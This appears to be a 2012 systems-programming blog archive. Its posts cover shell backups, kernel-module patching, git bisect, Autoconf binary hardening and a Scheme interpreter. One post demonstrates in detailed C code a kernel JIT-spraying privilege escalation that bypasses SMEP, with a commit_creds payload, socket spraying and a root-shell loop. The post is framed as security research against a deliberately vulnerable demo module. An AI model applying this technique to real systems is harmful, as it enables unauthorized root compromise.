Sunday, December 30, 2012

A shell recipe for backups with logs and history

I wrote a shell script for a cron job that grabs backups of some remote files. It has a few nice features:

Output from the backup commands is logged, with timestamps.
cron will send me email if one of the commands fails.
The history of each backup is saved in Git. Nothing sucks more than corrupting an important file and then syncing that corruption to your one and only backup.

Here's how it works.

#!/bin/bash -e

cd /home/keegan/backups
log="$(pwd)"/log

exec 3>&2 > >(ts >> "$log") 2>&1

You may have seen exec used to tail-call a command, but here we use it differently. When no command is given, exec applies file redirections to the current shell process.

We apply timestamps by redirecting output through ts (from moreutils), and append that to the log file. I would write exec | ts >> $log, except that pipe syntax is not supported with exec.

Instead we use process substitution. >(cmd) expands to the name of a file, whose contents will be sent to the specified command. This file name is a fine target for normal file output redirection with >. (It might name a temporary file created by the shell, or a special file under /dev/fd/.)

We also redirect standard error to the same place with 2>&1. But first we open the original standard error as file descriptor 3, using 3>&2.

function handle_error {
    echo 'Error occurred while running backup' >&3
    tail "$log" >&3
    exit 1
}
trap handle_error ERR

Since we specified bash -e in the first line of the script, Bash will exit as soon as any command fails. We use trap to register a function that gets called if this happens. The function writes some of the log file to the script's original standard output. cron will capture that and send mail to the system administrator.

Now we come to the actual backup commands.

cd foo
git pull

cd ../bar
rsync -v otherhost:bar/baz .
git commit --allow-empty -a -m '[AUTO] backup'
git repack -da

foo is a backup of a Git repo, so we just update a clone of that repo. If you want to be absolutely sure to preserve all commits, you can configure the backup repo to disable automatic garbage collection and keep infinite reflog.

bar is a local-only Git repo storing history of a file synced from another machine. Semantically, Git stores each version of a file as a separate blob object. If the files you're backing up are reasonably large, this can waste a lot of space quickly. But Git supports "packed" storage, where the objects in a repo are compressed together. By repacking the repo after every commit, we can save a ton of space.

Monday, December 17, 2012

Hex-editing Linux kernel modules to support new hardware

This is an old trick but a fun one. The ThinkPad X1 Carbon has no built-in Ethernet port. Instead it comes with a USB to Ethernet adapter. The adapter uses the ASIX AX88772 chip, which Linux has supported since time immemorial. But support for the particular adapter shipped by Lenovo was only added in Linux 3.7.

This was a problem for me, since I wanted to use a Debian installer with a 3.2 kernel. I could set up a build environment for that particular kernel and recompile the module. But this seemed like an annoying yak to shave when I just wanted to get the machine working.

The patch to support the Lenovo adapter just adds a new USB device ID to an existing driver:

 }, {
+       // Lenovo U2L100P 10/100
+       USB_DEVICE (0x17ef, 0x7203),
+       .driver_info = (unsigned long) &ax88772_info,
+}, {
        // ASIX AX88772B 10/100
        USB_DEVICE (0x0b95, 0x772b),
        .driver_info = (unsigned long) &ax88772_info,

As a quick-and-dirty solution, we can edit the compiled kernel module asix.ko, changing that existing device ID (0x0b95, 0x772b) to the Lenovo one (0x17ef, 0x7203). Since x86 CPUs are little-endian, this involves changing the bytes

95 0b 2b 77

ef 17 03 72

I wanted to do this within the Debian installer without rebooting. Busybox sed does not support hex escapes, but printf does:

sed $(printf 's/\x95\x0b\x2b\x77/\xef\x17\x03\x72/') \
    /lib/modules/$(uname -r)/kernel/drivers/net/usb/asix.ko \
    > /tmp/asix.ko

(It's worth checking that none of those bytes have untoward meanings as ASCII characters in a regular expression. As it happens, sed does not recognize + (aka \x2b) as repetition unless preceded by a backslash.)

Then I loaded the patched module along with its dependencies. A simple way is

modprobe asix
rmmod asix
insmod /tmp/asix.ko

And that was enough for me to complete the install over Ethernet. Of course, once everything is set up, it would be better to compile a properly-patched kernel using make-kpkg. I haven't got around to it yet because wireless is working great. :)

Saturday, November 17, 2012

Attacking hardened Linux systems with kernel JIT spraying

Intel's new Ivy Bridge CPUs support a security feature called Supervisor Mode Execution Protection (SMEP). It's supposed to thwart privilege escalation attacks, by preventing the kernel from executing a payload provided by userspace. In reality, there are many ways to bypass SMEP.

This article demonstrates one particularly fun approach. Since the Linux kernel implements a just-in-time compiler for Berkeley Packet Filter programs, we can use a JIT spraying attack to build our attack payload within the kernel's memory. Along the way, we will use another fun trick to create thousands of sockets even if RLIMIT_NOFILE is set as low as 11.

If you have some idea what I'm talking about, feel free to skip the next few sections and get to the gritty details. Otherwise, I hope to provide enough background that anyone with some systems programming experience can follow along. The code is available on GitHub too.

Note to script kiddies: This code won't get you root on any real system. It's not an exploit against current Linux; it's a demonstration of how such an exploit could be modified to bypass SMEP protections.

Kernel exploitation and SMEP

The basis of kernel security is the CPU's distinction between user and kernel mode. Code running in user mode cannot manipulate kernel memory. This allows the kernel to store things (like the user ID of the current process) without fear of tampering by userspace code.

In a typical kernel exploit, we trick the kernel into jumping to our payload code while the CPU is still in kernel mode. Then we can mess with kernel data structures and gain privileges. The payload can be an ordinary function in the exploit program's memory. After all, the CPU in kernel mode is allowed to execute user memory: it's allowed to do anything!

But what if it wasn't? When SMEP is enabled, the CPU will block any attempt to execute user memory while in kernel mode. (Of course, the kernel still has ultimate authority and can disable SMEP if it wants to. The goal is to prevent unintended execution of userspace code, as in a kernel exploit.)

So even if we find a bug which lets us hijack kernel control flow, we can only direct it towards legitimate kernel code. This is a lot like exploiting a userspace program with no-execute data, and the same techniques apply.

If you haven't seen some kernel exploits before, you might want to check out the talk I gave, or the many references linked from those slides.

JIT spraying

JIT spraying [PDF] is a viable tactic when we (the attacker) control the input to a just-in-time compiler. The JIT will write into executable memory on our behalf, and we have some control over what it writes.

Of course, a JIT compiling untrusted code will be careful with what instructions it produces. The trick of JIT spraying is that seemingly innocuous instructions can be trouble when looked at another way. Suppose we input this (pseudocode) program to a JIT:

x = 0xa8XXYYZZ
x = 0xa8PPQQRR
x = ...

(Here XXYYZZ and PPQQRR stand for arbitrary three-byte quantities.) The JIT might decide to put variable x in the %eax machine register, and produce x86 code like this:

machine code      assembly (AT&T syntax)

b8 ZZ YY XX a8    mov $0xa8XXYYZZ, %eax
b8 RR QQ PP a8    mov $0xa8PPQQRR, %eax
b8 ...

Looks harmless enough. But suppose we use a vulnerability elsewhere to direct control flow to the second byte of this program. The processor will then see an instruction stream like

ZZ YY XX          (payload instruction)
a8 b8             test $0xb8, %al
RR QQ PP          (payload instruction)
a8 b8             test $0xb8, %al
...

We control those bytes ZZ YY XX and RR QQ PP. So we can smuggle any sequence of three-byte x86 instructions into an executable memory page. The classic scenario is browser exploitation: we embed our payload into a JavaScript or Flash program as above, and then exploit a browser bug to redirect control into the JIT-compiled code. But it works equally well against kernels, as we shall see.

Attacking the BPF JIT

Berkeley Packet Filters (BPF) allow a userspace program to specify which network traffic it wants to receive. Filters are virtual machine programs which run in kernel mode. This is done for efficiency; it avoids a system call round-trip for each rejected packet. Since version 3.0, Linux on AMD64 optionally implements the BPF virtual machine using a just-in-time compiler.

For our JIT spray attack, we will build a BPF program in memory.

size_t code_len = 0;
struct sock_filter code[1024];

void emit_bpf(uint16_t opcode, uint32_t operand) {
    code[code_len++] = (struct sock_filter) BPF_STMT(opcode, operand);
}

A BPF "load immediate" instruction will compile to mov $x, %eax. We embed our payload instructions inside these, exactly as we saw above.

// Embed a three-byte x86 instruction.
void emit3(uint8_t x, uint8_t y, uint8_t z) {
    union {
        uint8_t  buf[4];
        uint32_t imm;
    } operand = {
        .buf = { x, y, z, 0xa8 }
    };

    emit_bpf(BPF_LD+BPF_IMM, operand.imm);
}

// Pad shorter instructions with nops.
#define emit2(_x, _y) emit3((_x), (_y), 0x90)
#define emit1(_x)     emit3((_x), 0x90, 0x90)

Remember, the byte a8 eats the opcode b8 from the following legitimate mov instruction, turning into the harmless instruction test $0xb8, %al.

Calling a kernel function is a slight challenge because we can only use three-byte instructions. We load the function's address one byte at a time, and sign-extend from 32 bits.

void emit_call(uint32_t addr) {
    emit2(0xb4, (addr & 0xff000000) >> 24);  // mov  $x,  %ah
    emit2(0xb0, (addr & 0x00ff0000) >> 16);  // mov  $x,  %al
    emit3(0xc1, 0xe0, 0x10);                 // shl  $16, %eax
    emit2(0xb4, (addr & 0x0000ff00) >>  8);  // mov  $x,  %ah
    emit2(0xb0, (addr & 0x000000ff));        // mov  $x,  %al
    emit2(0x48, 0x98);                       // cltq
    emit2(0xff, 0xd0);                       // call *%rax
}

Then we can build a classic "get root" payload like so:

emit3(0x48, 0x31, 0xff);  // xor  %rdi, %rdi
emit_call(get_kernel_symbol("prepare_kernel_cred"));
emit3(0x48, 0x89, 0xc7);  // mov  %rax, %rdi
emit_call(get_kernel_symbol("commit_creds"));
emit1(0xc3);              // ret

This is just the C call

commit_creds(prepare_kernel_cred(0));

expressed in our strange dialect of machine code. It will give root privileges to the process the kernel is currently acting on behalf of, i.e., our exploit program.

Looking up function addresses is a well-studied part of kernel exploitation. My get_kernel_symbol just greps through /proc/kallsyms, which is a simplistic solution for demonstration purposes. In a real-world exploit you would search a number of sources, including hard-coded values for the precompiled kernels put out by major distributions.

Alternatively the JIT spray payload could just disable SMEP, then jump to a traditional payload in userspace memory. We don't need any kernel functions to disable SMEP; we just poke a CPU control register. Once we get to the traditional payload, we're running normal C code in kernel mode, and we have the flexibility to search memory for any functions or data we might need.

Filling memory with sockets

The "spray" part of JIT spraying involves creating many copies of the payload in memory, and then making an informed guess of the address of one of them. In Dion Blazakis's original paper, this is done using a separate information leak in the Flash plugin.

For this kernel exploit, it turns out that we don't need any information leak. The BPF JIT uses module_alloc to allocate memory in the 1.5 GB space reserved for kernel modules. And the compiled program is aligned to a page, i.e., a multiple of 4 kB. So we have fewer than 19 bits of address to guess. If we can get 8000 copies of our program into memory, we have a 1 in 50 chance on each guess, which is not too bad.

Each socket can only have one packet filter attached, so we need to create a bunch of sockets. This means we could run into the resource limit on the number of open files. But there's a fun way around this limitation. (I learned this trick from Nelson Elhage but I haven't seen it published before.)

UNIX domain sockets can transmit things other than raw bytes. In particular, they can transmit file descriptors¹. An FD sitting in a UNIX socket buffer might have already been closed by the sender. But it could be read back out in the future, so the kernel has to maintain all data structures relating to the FD — including BPF programs!

So we can make as many BPF-filtered sockets as we want, as long as we send them into other sockets and close them as we go. There are limits on the number of FDs enqueued on a socket, as well as the depth² of sockets sent through sockets sent through etc. But we can easily hit our goal of 8000 filter programs using a tree structure.

#define SOCKET_FANOUT 20
#define SOCKET_DEPTH   3

// Create a socket with our BPF program attached.
int create_filtered_socket() {
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, &filt, sizeof(filt));
    return fd;
}

// Send an fd through a UNIX socket.
void send_fd(int dest, int fd_to_send);

// Create a whole bunch of filtered sockets.
void create_socket_tree(int parent, size_t depth) {
    int fds[2];
    size_t i;
    for (i=0; i<SOCKET_FANOUT; i++) {
        if (depth == (SOCKET_DEPTH - 1)) {
            // Leaf of the tree.
            // Create a filtered socket and send it to 'parent'.
            fds[0] = create_filtered_socket();
            send_fd(parent, fds[0]);
            close(fds[0]);
        } else {
            // Interior node of the tree.
            // Send a subtree into a UNIX socket pair.
            socketpair(AF_UNIX, SOCK_DGRAM, 0, fds);
            create_socket_tree(fds[0], depth+1);

            // Send the pair to 'parent' and close it.
            send_fd(parent, fds[0]);
            send_fd(parent, fds[1]);
            close(fds[0]);
            close(fds[1]);
        }
    }
}

The interface for sending FDs through a UNIX socket is really, really ugly, so I didn't show that code here. You can check out the implementation of send_fd if you want to.

The exploit

Since this whole article is about a strategy for exploiting kernel bugs, we need some kernel bug to exploit. For demonstration purposes I'll load an obviously insecure kernel module which will jump to any address we write to /proc/jump.

We know that a JIT-produced code page is somewhere in the region used for kernel modules. We want to land 3 bytes into this page, skipping an xor %eax, %eax (31 c0) and the initial b8 opcode.

#define MODULE_START 0xffffffffa0000000UL
#define MODULE_END   0xfffffffffff00000UL
#define MODULE_PAGES ((MODULE_END - MODULE_START) / 0x1000)

#define PAYLOAD_OFFSET 3

A bad guess will likely oops the kernel and kill the current process. So we fork off child processes to do the guessing, and keep doing this as long as they're dying with SIGKILL.

int status, jump_fd, urandom;
unsigned int pgnum;
uint64_t payload_addr;

// ...

jump_fd = open("/proc/jump",   O_WRONLY);
urandom = open("/dev/urandom", O_RDONLY);

do {
    if (!fork()) {
        // Child process
        read(urandom, &pgnum, sizeof(pgnum));
        pgnum %= MODULE_PAGES;
        payload_addr = MODULE_START + (0x1000 * pgnum) + PAYLOAD_OFFSET;

        write(jump_fd, &payload_addr, sizeof(payload_addr));
        execl("/bin/sh", "sh", NULL);  // Root shell!
    } else {
        wait(&status);
    }
} while (WIFSIGNALED(status) && (WTERMSIG(status) == SIGKILL));

The forked children get a copy the whole process's state, of course, but they don't actually need it. The BPF programs live in kernel memory, which is shared by all processes. So the program that sets up the payload could be totally unrelated to the one that guesses addresses.

Notes

The full source is available on GitHub. It includes some error handling and cleanup code that I elided above.

I'll admit that this is mostly a curiosity, for two reasons:

SMEP is not widely deployed yet.
The BPF JIT is disabled by default, and distributions don't enable it.

Unless Intel abandons SMEP in subsequent processors, it will be widespread within a few years. It's less clear that the BPF JIT will ever catch on as a default configuration. But I'll note in passing that Linux is now using BPF programs for process sandboxing as well.

The BPF JIT is enabled by writing 1 to /proc/sys/net/core/bpf_jit_enable. You can write 2 to enable a debug mode, which will print the compiled program and its address to the kernel log. This makes life unreasonably easy for my exploit, by removing the address guesswork.

I don't have a CPU with SMEP, but I did try a grsecurity / PaX hardened kernel. PaX's KERNEXEC feature implements³ in software a policy very similar to SMEP. And indeed, the JIT spray exploit succeeds where a traditional jump-to-userspace fails. (grsecurity has other features that would mitigate this attack, like the ability to lock out users who oops the kernel.)

The ARM, SPARC, and 64-bit PowerPC architectures each have their own BPF JIT. But I don't think they can be used for JIT spraying, because these architectures have fixed-size, aligned instructions. Perhaps on an ARM kernel built for Thumb-2...

Actually, file descriptions. The description is the kernel state pertaining to an open file. The descriptor is a small integer referring to a file description. When we send an FD into a UNIX socket, the descriptor number received on the other end might be different, but it will refer to the same description.↩
While testing this code, I got the error ETOOMANYREFS. This was easy to track down, as there's only one place in the entire kernel where it is used.↩
On i386, KERNEXEC uses x86 segmentation, with negligible performance impact. Unfortunately, AMD64's vestigial segmentation is not good enough, so there KERNEXEC relies on a GCC plugin to instrument every computed control flow instruction in the kernel. Specifically, it ors the target address with (1 << 63). If the target was a userspace address, the new address will be non-canonical and the processor will fault.↩

Tuesday, September 18, 2012

Tracking down unused variables with Pyflakes and git bisect

I was working on a Python project when I noticed a variable that was defined but never used. Does this indicate that some important code was accidentally deleted? Or was there just a minor oversight during refactoring?

To answer this question, I wanted to see the Git commit which removed the last use of this variable. This sounds like a job for git bisect. And because Pyflakes can detect unused variables, the whole process is completely automatic.

I made a guess that the mystery_variable became unused sometime within the past two weeks. Then I told Git to consider a commit "good" if Pyflakes's list of complaints does not mention mystery_variable.

$ git bisect start master master@{'2 weeks ago'}
Already on 'master'
Bisecting: 150 revisions left to test after this (roughly 7 steps)
[066327622129dbe863f6e2fc4746ff9e869bd049] Synthesize gravity

$ git bisect run bash -c '! pyflakes foo.py | grep mystery_variable'
running bash -c ! pyflakes foo.py | grep mystery_variable
Bisecting: 75 revisions left to test after this (roughly 6 steps)
[d3a5665eff478cccfb86d994a8fc289446325fbf] Model object components
running bash -c ! pyflakes foo.py | grep mystery_variable
Bisecting: 37 revisions left to test after this (roughly 5 steps)
[6ddcfbf27a1a4548acf972a6b817e485743f6bd9] Time-compress simulator clock
...

running bash -c ! pyflakes foo.py | grep mystery_variable
9c2b2f006207ae9f274f9182efeb3e009d18ed04 is the first bad commit
commit 9c2b2f006207ae9f274f9182efeb3e009d18ed04
Author: Ben Bitdiddle <bitdiddle@example.com>
Date:   Fri Sep 14 01:38:31 2012 -0400

    Reticulate splines

Now I can examine this commit and see what happened.

Sunday, September 9, 2012

taralli: Screen edge pointer wrapping for X

The maximum travel distance between points on a desktop is substantially reduced if the pointer is allowed to travel off a screen edge and reappear at the opposite edge. In other words, we change the topology of the desktop to be that of a torus. This is not a new idea: it's implemented in several window managers, programs for Windows and Mac OS X, and is even the subject of a research paper.

I wanted a standalone program to implement mouse pointer wrapping for X Windows on GNU/Linux. Previously I was using Synergy for this task. Synergy is a very cool program, but it's not a good choice for pointer wrapping on a single machine.

Correctness: I have several monitors at different resolutions, which means my desktop isn't rectangular. Synergy didn't understand where the edge of each monitor is.
Security: I don't need the exposure of 95,000 lines of code for this simple task. Even if there are no bugs in Synergy, I'm one configuration mistake away from running an unencrypted network keylogger.
Energy efficiency: Synergy wakes up 40 times per second even when nothing is happening. This can have a significant impact on laptop battery life.

So I wrote taralli as a simple replacement. It doesn't automatically understand non-rectangular desktops, but you can easily customize the pointer position mapping, to implement multi-monitor wrap-around or many other behaviors. (If someone would like to contribute the code to get multi-monitor information from Xinerama or something, I would be happy to add that.)

taralli is under 100 lines of C99. It has been tested on GNU/Linux and is likely portable to other X platforms. You can download it from GitHub, which is also a great place to submit any bug reports or patches.

Sunday, May 13, 2012

Automatic binary hardening with Autoconf

How do you protect a C program against memory corruption exploits? We should try to write code with no bugs, but we also need protection against any bugs which may lurk. Put another way, I try not to crash my bike but I still wear a helmet.

Operating systems now support a variety of tricks to make life difficult for would-be attackers. But most of these hardening features need to be enabled at compile time. When I started contributing to Mosh, I made it a goal to build with full hardening on every platform, not just proactive distributions like Ubuntu. This means detecting available hardening features at compile time.

Mosh uses Autotools, so this code is naturally part of the Autoconf script. I know that Autotools has a bad reputation in some circles, and I'm not going to defend it here. But a huge number of existing projects use Autotools. They can benefit today from a drop-in hardening recipe.

I've published an example project which uses Autotools to detect and enable some binary hardening features. To the extent possible under law, I waive all copyright and related or neighboring rights to the code I wrote for this project. (There are some third-party files in the m4/ subdirectory; those are governed by the respective licenses which appear in each file.) I want this code to be widely useful, and I welcome any refinements you have.

This article explains how my auto-detection code works, with some detail about the hardening measures themselves. If you just want to add hardening to your project, you don't necessarily need to read the whole thing. At the end I talk a bit about the performance implications.

How it works

The basic idea is simple. We use AX_CHECK_{COMPILE,LINK}_FLAG from the Autoconf Archive to detect support for each feature. The syntax is

AX_CHECK_COMPILE_FLAG(flag, action-if-supported, action-if-unsupported, extra-flags)

For extra-flags we generally pass -Werror so the compiler will fail on unrecognized flags. Since the project contains both C and C++ code, we check each flag once for the C compiler and once for the C++ compiler. Also, some flags depend on others, or have multiple alternative forms. This is reflected in the nesting structure of the action-if-supported and action-if-unsupported blocks. You can see the full story in configure.ac.

We accumulate all the supported flags into HARDEN_{C,LD}FLAGS and substitute these into each Makefile.am. The hardening flags take effect even if the user overrides CFLAGS on the command line. To explicitly disable hardening, pass

./configure --disable-hardening

A useful command when testing is

grep HARDEN config.log

Complications

Clang will not error out on unrecognized flags, even with -Werror. Instead it prints a message like

clang: warning: argument unused during compilation: '-foo'

and continues on blithely. I don't want these warnings to appear during the actual build, so I hacked around Clang's behavior. The script wrap-compiler-for-flag-check runs a command and errors out if the command prints a line containing "warning: argument unused". Then configure temporarily sets

CC="$srcdir/scripts/wrap-compiler-for-flag-check $CC"

while performing the flag checks.

When I integrated hardening into Mosh, I discovered that Ubuntu's default hardening flags conflict with ours. For example we set -Wstack-protector, meaning "warn about any unprotected functions", and they set --param=ssp-buffer-size=4, meaning "don't protect functions with fewer than 4 bytes of buffers". Our stack-protector flags are strictly more aggressive, so I disabled Ubuntu's by adding these lines to debian/rules:

export DEB_BUILD_MAINT_OPTIONS = hardening=-stackprotector
-include /usr/share/dpkg/buildflags.mk

We did something similar for Fedora.

Yet another problem is that Debian distributes skalibs (a Mosh dependency) as a static-only library, built without -fPIC, which in turn prevents Mosh from using -fPIC. Mosh can build the relevant parts of skalibs internally, but Debian and Ubuntu don't want us doing that. The unfortunate solution is simply to reimplement the small amount of skalibs we were using on Linux.

The flags

Here are the specific protections I enabled.

-D_FORTIFY_SOURCE=2 enables some compile-time and run-time checks on memory and string manipulation. This requires -O1 or higher. See also man 7 feature_test_macros.
-fno-strict-overflow prevents GCC from optimizing away arithmetic overflow tests.
-fstack-protector-all detects stack buffer overflows after they occur, using a stack canary. We also set -Wstack-protector (warn about unprotected functions) and --param ssp-buffer-size=1 (protect regardless of buffer size). (Actually, the "-all" part of -fstack-protector-all might imply ssp-buffer-size=1.)
Attackers can use fragments of legitimate code already in memory to stitch together exploits. This is much harder if they don't know where any of that code is located. Shared libraries get random addresses by default, but your program doesn't. Even an exploit against a shared library can take advantage of that. So we build a position independent executable (PIE), with the goal that every executable page has a randomized address.
Exploits can't overwrite read-only memory. Some areas could be marked as read-only except that the dynamic loader needs to perform relocations there. The GNU linker flag -z relro arranges to set them as read-only once the dynamic loader is done with them.

In particular, this can protect the PLT and GOT, which are classic targets for memory corruption. But PLT entries normally get resolved on demand, which means they're writable as the program runs. We set -z now to resolve PLT entries at startup so they get RELRO protection.

In the example project I also enabled -Wall -Wextra -Werror. These aren't hardening flags and we don't need to detect support, but they're quite important for catching security problems. If you can't make your project -Wall-clean, you can at least add security-relevant checks such as -Wformat-security.

Demonstration

On x86 Linux, we can check the hardening features using Tobias Klein's checksec.sh. First, as a control, let's build with no hardening.

$ ./build.sh --disable-hardening
+ autoreconf -fi
+ ./configure --disable-hardening
...
+ make
...
$ ~/checksec.sh --file src/test
No RELRO       No canary found  NX enabled  No PIE

The no-execute bit (NX) is mainly a kernel and CPU feature. It does not require much compiler support, and is enabled by default these days. Now we'll try full hardening:

$ ./build.sh
+ autoreconf -fi
+ ./configure
...
checking whether C compiler accepts -fno-strict-overflow... yes
checking whether C++ compiler accepts -fno-strict-overflow... yes
checking whether C compiler accepts -D_FORTIFY_SOURCE=2... yes
checking whether C++ compiler accepts -D_FORTIFY_SOURCE=2... yes
checking whether C compiler accepts -fstack-protector-all... yes
checking whether C++ compiler accepts -fstack-protector-all... yes
checking whether the linker accepts -fstack-protector-all... yes
checking whether C compiler accepts -Wstack-protector... yes
checking whether C++ compiler accepts -Wstack-protector... yes
checking whether C compiler accepts --param ssp-buffer-size=1... yes
checking whether C++ compiler accepts --param ssp-buffer-size=1... yes
checking whether C compiler accepts -fPIE... yes
checking whether C++ compiler accepts -fPIE... yes
checking whether the linker accepts -fPIE -pie... yes
checking whether the linker accepts -Wl,-z,relro... yes
checking whether the linker accepts -Wl,-z,now... yes
...
+ make
...
$ ~/checksec.sh --file src/test
Full RELRO     Canary found     NX enabled  PIE enabled

We can dig deeper on some of these. objdump -d shows that the unhardened executable puts main at a fixed address, say 0x4006e0, while the position-independent executable specifies a small offset like 0x9e0. We can also see the stack-canary checks:

b80:  sub   $0x18,%rsp
b84:  mov   %fs:0x28,%rax
b8d:  mov   %rax,0x8(%rsp)

      ... function body ...

b94:  mov   0x8(%rsp),%rax
b99:  xor   %fs:0x28,%rax
ba2:  jne   bb4 <c_fun+0x34>

      ... normal epilogue ...

bb4:  callq 9c0 <__stack_chk_fail@plt>

The function starts by copying a "canary" value from %fs:0x28 to the stack. On return, that value had better still be there; otherwise, an attacker has clobbered our stack frame.

The canary is chosen randomly by glibc at program start. The %fs segment has a random offset in linear memory, which makes it hard for an attacker to discover the canary through an information leak. This also puts it within thread-local storage, so glibc could use a different canary value for each thread (but I'm not sure if it does).

The hardening flags adapt to any other compiler options we specify. For example, let's try a static build:

$ ./build.sh LDFLAGS=-static
+ autoreconf -fi
+ ./configure LDFLAGS=-static
...
checking whether C compiler accepts -fPIE... yes
checking whether C++ compiler accepts -fPIE... yes
checking whether the linker accepts -fPIE -pie... no
...
+ make
...
$ file src/test
src/test: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux),
statically linked, for GNU/Linux 2.6.26, not stripped
$ ~/checksec.sh --file src/test
Partial RELRO  Canary found     NX enabled  No PIE

We can't have position independence with static linking. And checksec.sh thinks we aren't RELRO-protecting the PLT — but that's because we don't have one.

Performance

So what's the catch? These protections can slow down your program significantly. I ran a few benchmarks for Mosh, on three test machines:

A wimpy netbook: 1.6 GHz Atom N270, Ubuntu 12.04 i386
A reasonable laptop: 2.1 GHz Core 2 Duo T8100, Debian sid amd64
A beefy desktop: 3.0 GHz Phenom II X6 1075T, Debian sid amd64

In all three cases I built Mosh using GCC 4.6.3. Here's the relative slowdown, in percent.

Protections	Netbook	Laptop	Desktop
Everything	16.0	4.4	2.1
All except PIE	4.7	3.3	2.2
All except stack protector	11.0	1.0	1.1

PIE really hurts on i386 because data references use an extra register, and registers are scarce to begin with. It's much cheaper on amd64 thanks to PC-relative addressing.

There are other variables, of course. One Debian stable system with GCC 4.4 saw a 30% slowdown, with most of it coming from the stack protector. So this deserves further scrutiny, if your project is performance-critical. Mosh doesn't use very much CPU anyway, so I decided security is the dominant priority.

Saturday, April 28, 2012

Scheme without special forms: a metacircular adventure

A good programming language will have many libraries building on a small set of core features. Writing and distributing libraries is much easier than dealing with changes to a language implementation. Of course, the choice of core features affects the scope of things we can build as libraries. We want a very small core that still allows us to build anything.

The lambda calculus can implement any computable function, and encode arbitrary data types. Technically, it's all we need to instruct a computer. But programs also need to be written and understood by humans. We fleshy meatbags will soon get lost in a sea of unadorned lambdas. Our languages need to have more structure.

As an example, the Scheme programming language is explicitly based on the lambda calculus. But it adds syntactic special forms for definitions, variable binding, conditionals, etc. Scheme also lets the programmer define new syntactic forms as macros translating to existing syntax. Indeed, lambda and the macro system are enough to implement some of the standard special forms.

But we can do better. There's a simple abstraction which lets us define lambda, Lisp or Scheme macros, and all the other special forms as mere library code. This idea was known as "fexprs" in old Lisps, and more recently as "operatives" in John Shutt's programming language Kernel. Shutt's PhD thesis [PDF] has been a vital resource for learning about this stuff; I'm slowly making my way through its 416 pages.

What I understand so far can be summarized by something self-contained and kind of cool. Here's the agenda:

I'll describe a tiny programming language named Qoppa. Its S-expression syntax and basic data types are borrowed from Scheme. Qoppa has no special forms, and a small set of built-in operatives.
We'll write a Qoppa interpreter in Scheme.
We'll write a library for Qoppa which implements enough Scheme features to run the Qoppa interpreter.
We'll use this nested interpreter to very slowly compute the factorial of 5.

All of the code is on GitHub, if you'd like to see it in one place.

Operatives in Qoppa

An operative is a first-class value: it can be passed to and from functions, stored in data structures, and so forth. To use an operative, you apply it to some arguments, much like a function. The difference is that

The operative receives its arguments as unevaluated syntax trees, and
The operative also gets an argument representing the variable-binding environment at the call site.

Just as Scheme's functions are constructed by the lambda syntax, Qoppa's operatives are constructed by vau. Here's a simple example:

(define quote
    (vau (x) env
        x))

We bind a single argument as x, and bind the caller's environment as env. (Since we don't use env, we could replace it with _, which means to ignore the argument in that position, like Haskell's _ or Kernel's #ignore.) The body of the vau says to return the argument x, unevaluated.

So this implements Scheme's quote special form. If we evaluate the expression (quote x) we'll get the symbol x. As it happens, quote is used sparingly in Qoppa. There is usually a cleaner alternative, as we'll see.

Here's another operative:

(define list (vau xs env
    (if (null? xs)
        (quote ())
        (cons
            (eval env (car xs))
            (eval env (cons list (cdr xs)))))))

This list operative does the same thing as Scheme's list function: it evaluates any number of arguments and returns them in a list. So (list (+ 2 2) 3) evaluates to the list (4 3).

In Scheme, list is just (lambda xs xs). In Qoppa it's more involved, because we must explicitly evaluate each argument. This is the hallmark of (meta)programming with operatives: we selectively evaluate using eval, rather than selectively suppressing evaluation using quote.

The last part of this code deserves closer scrutiny:

(eval env (cons list (cdr xs)))

What if the caller's environment env contains a local binding for the name list? Not to worry, because we aren't quoting the name list. We're building a cons pair whose car is the value of list... an operative! Supposing xs is (1 2 3), the expression

(cons list (cdr xs))

evaluates to the list

(<some-value-representing-an-operative> 2 3)

and that's what eval sees. Just like lambda, evaluating a vau expression captures the current environment. When the resulting operative is used, the vau body gets values from this captured static environment, not the dynamic argument of the caller. So we have lexical scoping by default, with the option of dynamic scoping thanks to that env parameter.

Compare this situation with Lisp or Scheme macros. Lisp macros build code which refers to external stuff by name. Maintaining macro hygiene requires constant attention by the programmer. Scheme's macros are hygienic by default, but the macro system is far more complex. Rather than writing ordinary functions, we have to use one of several special-purpose sublanguages. Operatives provide the safety of Scheme macros, but (like Lisp macros) they use only the core computational features of the language.

Implementing Qoppa

Now that you have a taste of what the language is like, let's write a Qoppa interpreter in Scheme.

We will represent an environment as a list of frames, where a frame is simply an association list. Within the vau body in

( (vau (x) _ x) 3 )

the current environment would be something like

( ;; local frame
  ((x 3))

  ;; global frame
  ((cons <operative>)
   (car  <operative>)
   ...) )

Here's a Scheme function to build a frame from some names and the corresponding values.

(define (bind param val) (cond
    ((and (null? param) (null? val))
        '())
    ((eq? param '_)
        '())
    ((symbol? param)
        (list (list param val)))
    ((and (pair? param) (pair? val))
        (append
            (bind (car param) (car val))
            (bind (cdr param) (cdr val))))
    (else
        (error "can't bind" param val))))

We allow names and values to be arbitrary trees, so for example

(bind
    '((a b) . c)
    '((1 2) 3 4))

evaluates to

((a 1)
 (b 2)
 (c (3 4)))

(If you'll recall, (x . y) is the pair formed by (cons 'x 'y), an improper list.) The generality of bind means our argument-binding syntax — in vau, lambda, let, etc. — will be richer than Scheme's.

Next, a function to find a (name value) entry, given the name and an environment. This just invokes assq on each frame until we find a match.

(define (m-lookup name env)
    (if (null? env)
        (error "could not find" name)
        (let ((binding (assq name (car env))))
            (if binding
                binding
                (m-lookup name (cdr env))))))

We also need a representation for operatives. A simple choice is that a Qoppa operative is represented by a Scheme procedure that takes the operands and current environment as arguments. Now we can write the Qoppa evaluator itself.

(define (m-eval env exp) (cond
    ((symbol? exp)
        (cadr (m-lookup exp env)))
    ((pair? exp)
        (m-operate env (m-eval env (car exp)) (cdr exp)))
    (else
        exp)))

(define (m-operate env operative operands)
    (operative env operands))

The evaluator has only three cases. If exp is a symbol, it refers to a value in the current environment. If it's a cons pair, the car must evaluate to an operative and the cdr holds operands. Anything else evaluates to itself: numbers, strings, Booleans, and Qoppa operatives (represented by Scheme procedures).

Instead of the traditional eval and apply we have "eval" and "operate". Thanks to our uniform representation of operatives, the latter is very simple.

Qoppa builtins

Now we need to populate the global environment with useful built-in operatives. vau is the most significant of these. Here is its corresponding Scheme procedure.

(define (m-vau static-env vau-operands)
    (let ((params    (car   vau-operands))
          (env-param (cadr  vau-operands))
